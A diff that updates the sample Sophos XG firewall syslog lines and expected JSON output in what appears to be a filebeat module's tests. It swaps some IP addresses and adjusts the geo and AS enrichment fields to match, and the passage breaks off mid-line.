-<30>device="SFW" date=2020-05-18 time=14:38:37 timezone="CEST" device_name="XG230" device_id=1234567890123456 log_id=010101600001 log_type="Firewall" log_component="Firewall Rule" log_subtype="Allowed" status="Allow" priority=Information duration=11 fw_rule_id=21 policy_type=1 user_name="" user_gp="" iap=0 ips_policy_id=0 appfilter_policy_id=0 application="HTTP" application_risk=1 application_technology="Browser Based" application_category="General Internet" in_interface="Port1" out_interface="Port2" src_mac=00:00:00:00:00:00 src_ip=172.17.34.15 src_country_code=R1 dst_ip=91.228.167.86 dst_country_code=SVK protocol="TCP" src_port=62841 dst_port=80 sent_pkts=6  recv_pkts=5 sent_bytes=459 recv_bytes=606 tran_src_ip=213.167.51.66 tran_src_port=0 tran_dst_ip="" tran_dst_port=0 srczonetype="LAN" srczone="LAN" dstzonetype="WAN" dstzone="WAN" dir_disp="" connevent="Stop" connid="1617925280" vconnid="" hb_health="No Heartbeat" message="" appresolvedby="Signature" app_is_cloud=0
-<30>device="SFW" date=2020-05-18 time=14:38:38 timezone="CEST" device_name="XG230" device_id=1234567890123457 log_id=010101600001 log_type="Firewall" log_component="Firewall Rule" log_subtype="Allowed" status="Allow" priority=Information duration=0 fw_rule_id=67 policy_type=1 user_name="" user_gp="" iap=0 ips_policy_id=15 appfilter_policy_id=0 application="DNS" application_risk=1 application_technology="Network Protocol" application_category="Infrastructure" in_interface="Port3.400" out_interface="Port2" src_mac=00:00:00:00:00:00 src_ip=172.16.66.155 src_country_code=R1 dst_ip=91.228.165.117 dst_country_code=SVK protocol="UDP" src_port=49144 dst_port=53 sent_pkts=0  recv_pkts=0 sent_bytes=0 recv_bytes=0 tran_src_ip=185.8.209.194 tran_src_port=0 tran_dst_ip="" tran_dst_port=0 srczonetype="DMZ" srczone="DMZ" dstzonetype="WAN" dstzone="WAN" dir_disp="" connevent="Start" connid="3360392048" vconnid="" hb_health="No Heartbeat" message="" appresolvedby="Signature" app_is_cloud=0
+<30>device="SFW" date=2020-05-18 time=14:38:37 timezone="CEST" device_name="XG230" device_id=1234567890123456 log_id=010101600001 log_type="Firewall" log_component="Firewall Rule" log_subtype="Allowed" status="Allow" priority=Information duration=11 fw_rule_id=21 policy_type=1 user_name="" user_gp="" iap=0 ips_policy_id=0 appfilter_policy_id=0 application="HTTP" application_risk=1 application_technology="Browser Based" application_category="General Internet" in_interface="Port1" out_interface="Port2" src_mac=00:00:00:00:00:00 src_ip=1.128.3.4 src_country_code=R1 dst_ip=91.228.167.86 dst_country_code=SVK protocol="TCP" src_port=62841 dst_port=80 sent_pkts=6  recv_pkts=5 sent_bytes=459 recv_bytes=606 tran_src_ip=213.167.51.66 tran_src_port=0 tran_dst_ip="" tran_dst_port=0 srczonetype="LAN" srczone="LAN" dstzonetype="WAN" dstzone="WAN" dir_disp="" connevent="Stop" connid="1617925280" vconnid="" hb_health="No Heartbeat" message="" appresolvedby="Signature" app_is_cloud=0
+<30>device="SFW" date=2020-05-18 time=14:38:38 timezone="CEST" device_name="XG230" device_id=1234567890123457 log_id=010101600001 log_type="Firewall" log_component="Firewall Rule" log_subtype="Allowed" status="Allow" priority=Information duration=0 fw_rule_id=67 policy_type=1 user_name="" user_gp="" iap=0 ips_policy_id=15 appfilter_policy_id=0 application="DNS" application_risk=1 application_technology="Network Protocol" application_category="Infrastructure" in_interface="Port3.400" out_interface="Port2" src_mac=00:00:00:00:00:00 src_ip=67.43.156.12 src_country_code=R1 dst_ip=91.228.165.117 dst_country_code=SVK protocol="UDP" src_port=49144 dst_port=53 sent_pkts=0  recv_pkts=0 sent_bytes=0 recv_bytes=0 tran_src_ip=185.8.209.194 tran_src_port=0 tran_dst_ip="" tran_dst_port=0 srczonetype="DMZ" srczone="DMZ" dstzonetype="WAN" dstzone="WAN" dir_disp="" connevent="Start" connid="3360392048" vconnid="" hb_health="No Heartbeat" message="" appresolvedby="Signature" app_is_cloud=0
 <30>device="SFW" date=2020-05-18 time=14:38:39 timezone="CEST" device_name="XG230" device_id=1234567890123456 log_id=010102600002 log_type="Firewall" log_component="Firewall Rule" log_subtype="Denied" status="Deny" priority=Information duration=0 fw_rule_id=29 policy_type=1 user_name="" user_gp="" iap=2 ips_policy_id=0 appfilter_policy_id=0 application="" application_risk=0 application_technology="" application_category="" in_interface="Port1" out_interface="Port2" src_mac=24:01:c7:07:2b:a2 src_ip=172.17.35.113 src_country_code="" dst_ip=172.20.4.52 dst_country_code="" protocol="TCP" src_port=53287 dst_port=4980 sent_pkts=0  recv_pkts=0 sent_bytes=0 recv_bytes=0 tran_src_ip="" tran_src_port=0 tran_dst_ip="" tran_dst_port=0 srczonetype="" srczone="" dstzonetype="" dstzone="" dir_disp="" connid="" vconnid="" hb_health="No Heartbeat" message="" appresolvedby="Signature" app_is_cloud=0
 <30>device="SFW" date=2020-05-18 time=14:38:40 timezone="CEST" device_name="XG230" device_id=1234567890123456 log_id=010102600002 log_type="Firewall" log_component="Firewall Rule" log_subtype="Denied" status="Deny" priority=Information duration=0 fw_rule_id=29 policy_type=1 user_name="elastic@user.local" user_gp="elastic.group.local" iap=2 ips_policy_id=0 appfilter_policy_id=0 application="" application_risk=0 application_technology="" application_category="" in_interface="tun0" out_interface="Port1" src_mac="" src_ip=10.82.234.6 src_country_code="" dst_ip=192.168.0.1 dst_country_code="" protocol="TCP" src_port=60102 dst_port=53 sent_pkts=0  recv_pkts=0 sent_bytes=0 recv_bytes=0 tran_src_ip="" tran_src_port=0 tran_dst_ip="" tran_dst_port=0 srczonetype="" srczone="" dstzonetype="" dstzone="" dir_disp="" connid="" vconnid="" hb_health="No Heartbeat" message="" appresolvedby="Signature" app_is_cloud=0
-<30>device="SFW" date=2020-05-18 time=14:38:41 timezone="CEST" device_name="XG230" device_id=1234567890123457 log_id=010302602002 log_type="Firewall" log_component="Appliance Access" log_subtype="Denied" status="Deny" priority=Information duration=0 fw_rule_id=0 policy_type=0 user_name="" user_gp="" iap=0 ips_policy_id=0 appfilter_policy_id=0 application="" application_risk=0 application_technology="" application_category="" in_interface="Port2" out_interface="" src_mac=c4:f7:d5:b5:47:f4 src_ip=51.77.56.9 src_country_code="" dst_ip=185.7.209.207 dst_country_code="" protocol="TCP" src_port=55039 dst_port=18 sent_pkts=0  recv_pkts=0 sent_bytes=0 recv_bytes=0 tran_src_ip="" tran_src_port=0 tran_dst_ip="" tran_dst_port=0 srczonetype="" srczone="" dstzonetype="" dstzone="" dir_disp="" connid="" vconnid="" hb_health="No Heartbeat" message="" appresolvedby="Signature" app_is_cloud=0
+<30>device="SFW" date=2020-05-18 time=14:38:41 timezone="CEST" device_name="XG230" device_id=1234567890123457 log_id=010302602002 log_type="Firewall" log_component="Appliance Access" log_subtype="Denied" status="Deny" priority=Information duration=0 fw_rule_id=0 policy_type=0 user_name="" user_gp="" iap=0 ips_policy_id=0 appfilter_policy_id=0 application="" application_risk=0 application_technology="" application_category="" in_interface="Port2" out_interface="" src_mac=c4:f7:d5:b5:47:f4 src_ip=67.43.156.12 src_country_code="" dst_ip=185.7.209.207 dst_country_code="" protocol="TCP" src_port=55039 dst_port=18 sent_pkts=0  recv_pkts=0 sent_bytes=0 recv_bytes=0 tran_src_ip="" tran_src_port=0 tran_dst_ip="" tran_dst_port=0 srczonetype="" srczone="" dstzonetype="" dstzone="" dir_disp="" connid="" vconnid="" hb_health="No Heartbeat" message="" appresolvedby="Signature" app_is_cloud=0
 <30>device="SFW" date=2020-05-18 time=14:38:42 timezone="CEST" device_name="XG230" device_id=1234567890123456 log_id=010102600002 log_type="Firewall" log_component="Firewall Rule" log_subtype="Denied" status="Deny" priority=Information duration=0 fw_rule_id=29 policy_type=1 user_name="elastic@user.local" user_gp="elastic.group.local" iap=2 ips_policy_id=0 appfilter_policy_id=0 application="" application_risk=0 application_technology="" application_category="" in_interface="Port1" out_interface="Port2" src_mac=24:01:c7:07:2b:a2 src_ip=172.17.35.101 src_country_code="" dst_ip=192.168.5.11 dst_country_code="" protocol="TCP" src_port=51826 dst_port=1109 sent_pkts=0  recv_pkts=0 sent_bytes=0 recv_bytes=0 tran_src_ip="" tran_src_port=0 tran_dst_ip="" tran_dst_port=0 srczonetype="" srczone="" dstzonetype="" dstzone="" dir_disp="" connid="" vconnid="" hb_health="No Heartbeat" message="" appresolvedby="Signature" app_is_cloud=0
 <30>device="SFW" date=2020-05-18 time=14:38:43 timezone="CEST" device_name="XG230" device_id=1234567890123457 log_id=010402403001 log_type="Firewall" log_component="DoS Attack" log_subtype="Denied" status="Deny" priority=Warning duration=0 fw_rule_id=0 policy_type=0 user_name="" user_gp="" iap=0 ips_policy_id=0 appfilter_policy_id=0 application="" application_risk=0 application_technology="" application_category="" in_interface="Port1" out_interface="" src_mac=34:db:fd:83:d8:09 src_ip=172.16.36.105 src_country_code="" dst_ip=10.84.234.14 dst_country_code="" protocol="UDP" src_port=3389 dst_port=64465 sent_pkts=0  recv_pkts=0 sent_bytes=0 recv_bytes=0 tran_src_ip="" tran_src_port=0 tran_dst_ip="" tran_dst_port=0 srczonetype="" srczone="" dstzonetype="" dstzone="" dir_disp="" connid="" vconnid="" hb_health="No Heartbeat" message="" appresolvedby="Signature" app_is_cloud=0
 <30>device="SFW" date=2020-05-18 time=14:38:44 timezone="CEST" device_name="XG230" device_id=1234567890123456 log_id=012802605201 log_type="Firewall" log_component="SSL VPN" log_subtype="Denied" status="Deny" priority=Information duration=0 fw_rule_id=0 policy_type=0 user_name="" user_gp="" iap=0 ips_policy_id=0 appfilter_policy_id=0 application="" application_risk=0 application_technology="" application_category="" in_interface="tun0" out_interface="" src_mac="" src_ip=10.82.234.9 src_country_code="" dst_ip=10.82.234.11 dst_country_code="" protocol="TCP" src_port=58331 dst_port=56267 sent_pkts=0  recv_pkts=0 sent_bytes=0 recv_bytes=0 tran_src_ip="" tran_src_port=0 tran_dst_ip="" tran_dst_port=0 srczonetype="" srczone="" dstzonetype="" dstzone="" dir_disp="" connid="" vconnid="" hb_health="No Heartbeat" message="" appresolvedby="Signature" app_is_cloud=0
 <30>device="SFW" date=2020-05-18 time=14:38:45 timezone="CEST" device_name="XG230" device_id=1234567890123456 log_id=010101600001 log_type="Firewall" log_component="Firewall Rule" log_subtype="Allowed" status="Allow" priority=Information duration=0 fw_rule_id=61 policy_type=2 user_name="elastic@user.local" user_gp="elastic.group.local" iap=0 ips_policy_id=11 appfilter_policy_id=0 application="" application_risk=0 application_technology="" application_category="" in_interface="ipsec0" out_interface="Port2" src_mac=00:00:00:00:00:00 src_ip=10.84.234.7 src_country_code=R1 dst_ip=172.16.34.50 dst_country_code=R1 protocol="TCP" src_port=58543 dst_port=443 sent_pkts=0  recv_pkts=0 sent_bytes=0 recv_bytes=0 tran_src_ip="" tran_src_port=0 tran_dst_ip="" tran_dst_port=0 srczonetype="VPN" srczone="VPN" dstzonetype="VPN" dstzone="VPN" dir_disp="" connevent="Start" connid="1615935064" vconnid="" hb_health="No Heartbeat" message="" appresolvedby="Signature" app_is_cloud=0
 <30>device="SFW" date=2020-05-18 time=14:38:45 timezone="CEST" device_name="XG230" device_id=1234567890123457 log_id=018201500005 log_type="Firewall" log_component="ICMP ERROR MESSAGE" log_subtype="Allowed" status="Allow" priority=Notice duration=0 fw_rule_id=60 policy_type=1 user_name="" user_gp="" iap=0 ips_policy_id=17 appfilter_policy_id=0 application="" application_risk=0 application_technology="" application_category="" in_interface="Port1" out_interface="" src_mac=34:db:fd:83:d8:09 src_ip=192.168.1.254 src_country_code="" dst_ip=172.17.32.19 dst_country_code="" protocol="ICMP" icmp_type=3 icmp_code=1 sent_pkts=0  recv_pkts=0 sent_bytes=0 recv_bytes=0 tran_src_ip="" tran_src_port=0 tran_dst_ip="" tran_dst_port=0 srczonetype="" srczone="" dstzonetype="" dstzone="" dir_disp="" connevent="Interim" connid="2685668438" vconnid="" hb_health="No Heartbeat" message="" appresolvedby="Signature" app_is_cloud=0
 <30>device="SFW" date=2020-06-05 time=12:38:53 timezone="CEST" device_name="XG230" device_id=1234567890123457 log_id=010101600001 log_type="Firewall" log_component="Firewall Rule" log_subtype="Allowed" status="Allow" priority=Information duration=10 fw_rule_id=60 policy_type=1 user_name="" user_gp="" iap=0 ips_policy_id=17 appfilter_policy_id=0 application="" application_risk=0 application_technology="" application_category="" in_interface="ipsec0" out_interface="Port1" src_mac=00:00:00:00:00:00 src_ip=172.17.35.119 src_country_code=R1 dst_ip=172.16.34.10 dst_country_code=R1 protocol="TCP" src_port=61925 dst_port=88 sent_pkts=6  recv_pkts=6 sent_bytes=1802 recv_bytes=1732 tran_src_ip= tran_src_port=0 tran_dst_ip= tran_dst_port=0srczonetype="VPN" srczone="VPN" dstzonetype="LAN" dstzone="LAN" dir_disp="" connevent="Stop" connid="1617126256" vconnid="" hb_health="NoHeartbeat" message="" appresolvedby="Signature" app_is_cloud=0"
-<30>device="SFW" date=2018-05-30 time=13:26:37 timezone="IST" device_name="XG125w" device_id=SFDemo-763180a log_id=010202601001 log_type="Firewall" log_component="Invalid Traffic" log_subtype="Denied" status="Deny" priority=Information duration=0 fw_rule_id=0 policy_type=0 user_name="" user_gp="" iap=0 ips_policy_id=0 appfilter_policy_id=0 application="" application_risk=0 application_technology="" application_category="" in_interface="" out_interface="" src_mac= src_ip=10.198.32.19 src_country_code= dst_ip=8.8.8.8 dst_country_code= protocol="UDP" src_port=1353 dst_port=0 sent_pkts=0 recv_pkts=0 sent_bytes=0 recv_bytes=0 tran_src_ip= tran_src_port=0 tran_dst_ip= tran_dst_port=0 srczonetype="" srczone="" dstzonetype="" dstzone="" dir_disp="" connid="" vconnid="" hb_health="No Heartbeat" message="Invalid UDP destination." appresolvedby=" Signature"
+<30>device="SFW" date=2018-05-30 time=13:26:37 timezone="IST" device_name="XG125w" device_id=SFDemo-763180a log_id=010202601001 log_type="Firewall" log_component="Invalid Traffic" log_subtype="Denied" status="Deny" priority=Information duration=0 fw_rule_id=0 policy_type=0 user_name="" user_gp="" iap=0 ips_policy_id=0 appfilter_policy_id=0 application="" application_risk=0 application_technology="" application_category="" in_interface="" out_interface="" src_mac= src_ip=10.198.32.19 src_country_code= dst_ip=175.16.199.1 dst_country_code= protocol="UDP" src_port=1353 dst_port=0 sent_pkts=0 recv_pkts=0 sent_bytes=0 recv_bytes=0 tran_src_ip= tran_src_port=0 tran_dst_ip= tran_dst_port=0 srczonetype="" srczone="" dstzonetype="" dstzone="" dir_disp="" connid="" vconnid="" hb_health="No Heartbeat" message="Invalid UDP destination." appresolvedby=" Signature"
 <30>device="SFW" date=2018-06-04 time=17:20:24 timezone="IST" device_name="XG125w" device_id=SFDemo-763180a log_id=011402601301 log_type="Firewall" log_component="Fragmented Traffic" log_subtype="Denied" status="Deny" priority=Information duration=0 fw_rule_id=0 policy_type=0 user_name="" user_gp="" iap=0 ips_policy_id=0 appfilter_policy_id=0 application="" application_risk=0 application_technology="" application_category="" in_interface="" out_interface="" src_mac= src_ip=0.0.0.0 src_country_code= dst_ip=0.0.0.0 dst_country_code= protocol="0" src_port=0 dst_port=0 sent_pkts=0 recv_pkts=0 sent_bytes=0 recv_bytes=0 tran_src_ip= tran_src_port=0 tran_dst_ip= tran_dst_port=0 srczonetype="" srczone="" dstzonetype="" dstzone="" dir_disp="" connid="" vconnid="" hb_health="No Heartbeat" message="" appresolvedby="Signature"
 <30>device="SFW" date=2018-05-30 time=14:01:32 timezone="IST" device_name="XG125w" device_id=SFDemo-763180a log_id=010302602002 log_type="Firewall" log_component="Appliance Access" log_subtype="Denied" status="Deny" priority=Information duration=0 fw_rule_id=2 policy_type=0 user_name="" user_gp="" iap=0 ips_policy_id=0 appfilter_policy_id=0 application="" application_risk=0 application_technology="" application_category="" in_interface="Port2.611" out_interface="" src_mac=c8:5b:76:ab:72:d3 src_ip=10.198.38.184 src_country_code= dst_ip=10.198.39.255 dst_country_code= protocol="UDP" src_port=137 dst_port=137 sent_pkts=0 recv_pkts=0 sent_bytes=0 recv_bytes=0 tran_src_ip= tran_src_port=0 tran_dst_ip= tran_dst_port=0 srczonetype="" srczone="" dstzonetype="" dstzone="" dir_disp="" connid="" vconnid="" hb_health="No Heartbeat" message="" appresolvedby="Signature"
 <30>device="SFW" date=2018-05-30 time=14:17:17 timezone="IST" device_name="XG125w" device_id=SFDemo-763180a log_id=010402403001 log_type="Firewall" log_component="DoS Attack" log_subtype="Denied" status="Deny" priority=Warning duration=0 fw_rule_id=0 policy_type=0 user_name="" user_gp="" iap=0 ips_policy_id=0 appfilter_policy_id=0 application="" application_risk=0 application_technology="" application_category="" in_interface="Port1" out_interface="" src_mac=b8:97:5a:5b:0f:fd src_ip=10.198.32.19 src_country_code= dst_ip=10.198.32.48 dst_country_code= protocol="TCP" src_port=41960 dst_port=22 sent_pkts=0 recv_pkts=0 sent_bytes=0 recv_bytes=0 tran_src_ip= tran_src_port=0 tran_dst_ip= tran_dst_port=0 srczonetype="" srczone="" dstzonetype="" dstzone="" dir_disp="" connid="" vconnid="" hb_health="No Heartbeat" message="" appresolvedby=" Signature"
 <30>device="SFW" date=2018-06-05 time=14:30:31 timezone="IST" device_name="XG125w" device_id=SFDemo-763180a log_id=010502604001 log_type="Firewall" log_component="ICMP Redirection" log_subtype="Denied" status="Deny" priority=Information duration=0 fw_rule_id=0 policy_type=0 user_name="" user_gp="" iap=0 ips_policy_id=0 appfilter_policy_id=0 application="" application_risk=0 application_technology="" application_category="" in_interface="" out_interface="" src_mac= src_ip=10.198.37.23 src_country_code= dst_ip=10.198.36.48 dst_country_code= protocol="ICMP" icmp_type=5 icmp_code=1 sent_pkts=0 recv_pkts=0 sent_bytes=0 recv_bytes=0 tran_src_ip= tran_src_port=0 tran_dst_ip= tran_dst_port=0 srczonetype="" srczone="" dstzonetype="" dstzone="" dir_disp="" connid="" vconnid="" hb_health="No Heartbeat" message="" appresolvedby=" Signature"
-<30>device="SFW" date=2018-05-31 time=17:05:14 timezone="IST" device_name="XG125w" device_id=SFDemo-763180a log_id=010602605001 log_type="Firewall" log_component="Source Routed" log_subtype="Denied" status="Deny" priority=Information duration=0 fw_rule_id=1 policy_type=1 user_name="" user_gp="" iap=0 ips_policy_id=0 appfilter_policy_id=0 application="" application_risk=0 application_technology="" application_category="" in_interface="" out_interface="" src_mac= src_ip=10.198.12.19 src_country_code= dst_ip=8.8.8.8 dst_country_code= protocol="TCP" src_port=1571 dst_port=80 sent_pkts=0 recv_pkts=0 sent_bytes=0 recv_bytes=0 tran_src_ip= tran_src_port=0 tran_dst_ip= tran_dst_port=0 srczonetype="" srczone="" dstzonetype="" dstzone="" dir_disp="" connid="" vconnid="" hb_health="No Heartbeat" message="" appresolvedby="Signature"
+<30>device="SFW" date=2018-05-31 time=17:05:14 timezone="IST" device_name="XG125w" device_id=SFDemo-763180a log_id=010602605001 log_type="Firewall" log_component="Source Routed" log_subtype="Denied" status="Deny" priority=Information duration=0 fw_rule_id=1 policy_type=1 user_name="" user_gp="" iap=0 ips_policy_id=0 appfilter_policy_id=0 application="" application_risk=0 application_technology="" application_category="" in_interface="" out_interface="" src_mac= src_ip=10.198.12.19 src_country_code= dst_ip=175.16.199.1 dst_country_code= protocol="TCP" src_port=1571 dst_port=80 sent_pkts=0 recv_pkts=0 sent_bytes=0 recv_bytes=0 tran_src_ip= tran_src_port=0 tran_dst_ip= tran_dst_port=0 srczonetype="" srczone="" dstzonetype="" dstzone="" dir_disp="" connid="" vconnid="" hb_health="No Heartbeat" message="" appresolvedby="Signature"
 <30>device="SFW" date=2018-05-30 time=15:09:51 timezone="IST" device_name="XG125w" device_id=SFDemo-763180a log_id=011702605051 log_type="Firewall" log_component="MAC Filter" log_subtype="Denied" status="Deny" priority=Information duration=0 fw_rule_id=0 policy_type=0 user_name="" user_gp="" iap=0 ips_policy_id=0 appfilter_policy_id=0 application="" application_risk=0 application_technology="" application_category="" in_interface="Port2.531" out_interface="" src_mac=1e:3a:5a:5b:23:ab src_ip=fe80::59f5:3ce8:c98e:5062 src_country_code= dst_ip=ff02::1:2 dst_country_code= protocol="UDP" src_port=546 dst_port=547 sent_pkts=0 recv_pkts=0 sent_bytes=0 recv_bytes=0 tran_src_ip= tran_src_port=0 tran_dst_ip= tran_dst_port=0 srczonetype="" srczone="" dstzonetype="" dstzone="" dir_disp="" connid="" vconnid="" hb_health="No Heartbeat" message="" appresolvedby="Signature"
 <30>device="SFW" date=2018-06-01 time=10:57:55 timezone="BST" device_name="XG310" device_id=SFDemo-9a04c43 log_id=016602600006 log_type="Firewall" log_component="Heartbeat" log_subtype="Denied" status="Deny" priority=Information duration=0 fw_rule_id=16 policy_type=1 user_name="" user_gp="" iap=2 ips_policy_id=0 appfilter_policy_id=0 application="" application_risk=0 application_technology="" application_category="" in_interface="Port3.611" out_interface="" src_mac=08:00:27:4c:49:e3 src_ip=10.198.37.57 src_country_code= dst_ip=10.198.32.19 dst_country_code= protocol="ICMP" icmp_type=8 icmp_code=0 sent_pkts=0 recv_pkts=0 sent_bytes=0 recv_bytes=0 tran_src_ip= tran_src_port=0 tran_dst_ip= tran_dst_port=0 srczonetype="" srczone="" dstzonetype="" dstzone="" dir_disp="" connid="" vconnid="" hb_health="Red" message="" appresolvedby="Signature" app_is_cloud=0
 <30>device="SFW" date=2018-06-01 time=10:55:41 timezone="BST" device_name="XG310" device_id=SFDemo-9a04c43 log_id=016602600003 log_type="Firewall" log_component="Heartbeat" log_subtype="Denied" status="Deny" priority=Information duration=0 fw_rule_id=16 policy_type=1 user_name="" user_gp="" iap=2 ips_policy_id=0 appfilter_policy_id=0 application="" application_risk=0 application_technology="" application_category="" in_interface="Port3.611" out_interface="" src_mac=08:00:27:4c:49:e3 src_ip=10.198.37.57 src_country_code= dst_ip=72.163.4.185 dst_country_code= protocol="ICMP" icmp_type=8 icmp_code=0 sent_pkts=0 recv_pkts=0 sent_bytes=0 recv_bytes=0 tran_src_ip= tran_src_port=0 tran_dst_ip= tran_dst_port=0 srczonetype="" srczone="" dstzonetype="" dstzone="" dir_disp="" connid="" vconnid="" hb_health="Red" message="" appresolvedby="Signature" app_is_cloud=0
diff --git a/x-pack/filebeat/module/sophos/xg/test/firewall.log-expected.json b/x-pack/filebeat/module/sophos/xg/test/firewall.log-expected.json
index d441f78dbfd9..deb91f6a5a39 100644
--- a/x-pack/filebeat/module/sophos/xg/test/firewall.log-expected.json
+++ b/x-pack/filebeat/module/sophos/xg/test/firewall.log-expected.json
@@ -2,22 +2,12 @@
     {
         "@timestamp": "2020-05-18T14:38:37.000-02:00",
         "client.bytes": 459,
-        "client.ip": "172.17.34.15",
+        "client.ip": "1.128.3.4",
         "client.mac": "00:00:00:00:00:00",
         "client.nat.port": 0,
         "client.packets": 6,
         "client.port": 62841,
-        "destination.as.number": 50881,
-        "destination.as.organization.name": "ESET, spol. s r.o.",
         "destination.bytes": 606,
-        "destination.geo.city_name": "Bratislava",
-        "destination.geo.continent_name": "Europe",
-        "destination.geo.country_iso_code": "SK",
-        "destination.geo.country_name": "Slovakia",
-        "destination.geo.location.lat": 48.15,
-        "destination.geo.location.lon": 17.1078,
-        "destination.geo.region_iso_code": "SK-BL",
-        "destination.geo.region_name": "Bratislava",
         "destination.ip": "91.228.167.86",
         "destination.nat.port": 0,
         "destination.packets": 5,
@@ -32,7 +22,7 @@
         "event.end": "2020-05-18T14:38:48.000-02:00",
         "event.kind": "event",
         "event.module": "sophos",
-        "event.original": "device=\"SFW\" date=2020-05-18 time=14:38:37 timezone=\"CEST\" device_name=\"XG230\" device_id=1234567890123456 log_id=010101600001 log_type=\"Firewall\" log_component=\"Firewall Rule\" log_subtype=\"Allowed\" status=\"Allow\" priority=Information duration=11 fw_rule_id=21 policy_type=1 user_name=\"\" user_gp=\"\" iap=0 ips_policy_id=0 appfilter_policy_id=0 application=\"HTTP\" application_risk=1 application_technology=\"Browser Based\" application_category=\"General Internet\" in_interface=\"Port1\" out_interface=\"Port2\" src_mac=00:00:00:00:00:00 src_ip=172.17.34.15 src_country_code=R1 dst_ip=91.228.167.86 dst_country_code=SVK protocol=\"TCP\" src_port=62841 dst_port=80 sent_pkts=6  recv_pkts=5 sent_bytes=459 recv_bytes=606 tran_src_ip=213.167.51.66 tran_src_port=0 tran_dst_ip=\"\" tran_dst_port=0 srczonetype=\"LAN\" srczone=\"LAN\" dstzonetype=\"WAN\" dstzone=\"WAN\" dir_disp=\"\" connevent=\"Stop\" connid=\"1617925280\" vconnid=\"\" hb_health=\"No Heartbeat\" message=\"\" appresolvedby=\"Signature\" app_is_cloud=0",
+        "event.original": "device=\"SFW\" date=2020-05-18 time=14:38:37 timezone=\"CEST\" device_name=\"XG230\" device_id=1234567890123456 log_id=010101600001 log_type=\"Firewall\" log_component=\"Firewall Rule\" log_subtype=\"Allowed\" status=\"Allow\" priority=Information duration=11 fw_rule_id=21 policy_type=1 user_name=\"\" user_gp=\"\" iap=0 ips_policy_id=0 appfilter_policy_id=0 application=\"HTTP\" application_risk=1 application_technology=\"Browser Based\" application_category=\"General Internet\" in_interface=\"Port1\" out_interface=\"Port2\" src_mac=00:00:00:00:00:00 src_ip=1.128.3.4 src_country_code=R1 dst_ip=91.228.167.86 dst_country_code=SVK protocol=\"TCP\" src_port=62841 dst_port=80 sent_pkts=6  recv_pkts=5 sent_bytes=459 recv_bytes=606 tran_src_ip=213.167.51.66 tran_src_port=0 tran_dst_ip=\"\" tran_dst_port=0 srczonetype=\"LAN\" srczone=\"LAN\" dstzonetype=\"WAN\" dstzone=\"WAN\" dir_disp=\"\" connevent=\"Stop\" connid=\"1617925280\" vconnid=\"\" hb_health=\"No Heartbeat\" message=\"\" appresolvedby=\"Signature\" app_is_cloud=0",
         "event.outcome": "success",
         "event.severity": "6",
         "event.start": "2020-05-18T14:38:37.000-02:00",
@@ -64,7 +54,7 @@
             "my_fancy_host"
         ],
         "related.ip": [
-            "172.17.34.15",
+            "1.128.3.4",
             "213.167.51.66",
             "91.228.167.86"
         ],
@@ -97,15 +87,10 @@
         "sophos.xg.priority": "Information",
         "sophos.xg.src_country_code": "R1",
         "sophos.xg.status": "Allow",
-        "source.as.number": 8905,
-        "source.as.organization.name": "Digit One LLC",
+        "source.as.number": 1221,
+        "source.as.organization.name": "Telstra Pty Ltd",
         "source.bytes": 459,
-        "source.geo.continent_name": "Europe",
-        "source.geo.country_iso_code": "RU",
-        "source.geo.country_name": "Russia",
-        "source.geo.location.lat": 55.7386,
-        "source.geo.location.lon": 37.6068,
-        "source.ip": "172.17.34.15",
+        "source.ip": "1.128.3.4",
         "source.mac": "00:00:00:00:00:00",
         "source.nat.ip": "213.167.51.66",
         "source.nat.port": 0,
@@ -119,22 +104,12 @@
     {
         "@timestamp": "2020-05-18T14:38:38.000-02:00",
         "client.bytes": 0,
-        "client.ip": "172.16.66.155",
+        "client.ip": "67.43.156.12",
         "client.mac": "00:00:00:00:00:00",
         "client.nat.port": 0,
         "client.packets": 0,
         "client.port": 49144,
-        "destination.as.number": 50881,
-        "destination.as.organization.name": "ESET, spol. s r.o.",
         "destination.bytes": 0,
-        "destination.geo.city_name": "Bratislava",
-        "destination.geo.continent_name": "Europe",
-        "destination.geo.country_iso_code": "SK",
-        "destination.geo.country_name": "Slovakia",
-        "destination.geo.location.lat": 48.15,
-        "destination.geo.location.lon": 17.1078,
-        "destination.geo.region_iso_code": "SK-BL",
-        "destination.geo.region_name": "Bratislava",
         "destination.ip": "91.228.165.117",
         "destination.nat.port": 0,
         "destination.packets": 0,
@@ -149,7 +124,7 @@
         "event.end": "2020-05-18T14:38:38.000-02:00",
         "event.kind": "event",
         "event.module": "sophos",
-        "event.original": "device=\"SFW\" date=2020-05-18 time=14:38:38 timezone=\"CEST\" device_name=\"XG230\" device_id=1234567890123457 log_id=010101600001 log_type=\"Firewall\" log_component=\"Firewall Rule\" log_subtype=\"Allowed\" status=\"Allow\" priority=Information duration=0 fw_rule_id=67 policy_type=1 user_name=\"\" user_gp=\"\" iap=0 ips_policy_id=15 appfilter_policy_id=0 application=\"DNS\" application_risk=1 application_technology=\"Network Protocol\" application_category=\"Infrastructure\" in_interface=\"Port3.400\" out_interface=\"Port2\" src_mac=00:00:00:00:00:00 src_ip=172.16.66.155 src_country_code=R1 dst_ip=91.228.165.117 dst_country_code=SVK protocol=\"UDP\" src_port=49144 dst_port=53 sent_pkts=0  recv_pkts=0 sent_bytes=0 recv_bytes=0 tran_src_ip=185.8.209.194 tran_src_port=0 tran_dst_ip=\"\" tran_dst_port=0 srczonetype=\"DMZ\" srczone=\"DMZ\" dstzonetype=\"WAN\" dstzone=\"WAN\" dir_disp=\"\" connevent=\"Start\" connid=\"3360392048\" vconnid=\"\" hb_health=\"No Heartbeat\" message=\"\" appresolvedby=\"Signature\" app_is_cloud=0",
+        "event.original": "device=\"SFW\" date=2020-05-18 time=14:38:38 timezone=\"CEST\" device_name=\"XG230\" device_id=1234567890123457 log_id=010101600001 log_type=\"Firewall\" log_component=\"Firewall Rule\" log_subtype=\"Allowed\" status=\"Allow\" priority=Information duration=0 fw_rule_id=67 policy_type=1 user_name=\"\" user_gp=\"\" iap=0 ips_policy_id=15 appfilter_policy_id=0 application=\"DNS\" application_risk=1 application_technology=\"Network Protocol\" application_category=\"Infrastructure\" in_interface=\"Port3.400\" out_interface=\"Port2\" src_mac=00:00:00:00:00:00 src_ip=67.43.156.12 src_country_code=R1 dst_ip=91.228.165.117 dst_country_code=SVK protocol=\"UDP\" src_port=49144 dst_port=53 sent_pkts=0  recv_pkts=0 sent_bytes=0 recv_bytes=0 tran_src_ip=185.8.209.194 tran_src_port=0 tran_dst_ip=\"\" tran_dst_port=0 srczonetype=\"DMZ\" srczone=\"DMZ\" dstzonetype=\"WAN\" dstzone=\"WAN\" dir_disp=\"\" connevent=\"Start\" connid=\"3360392048\" 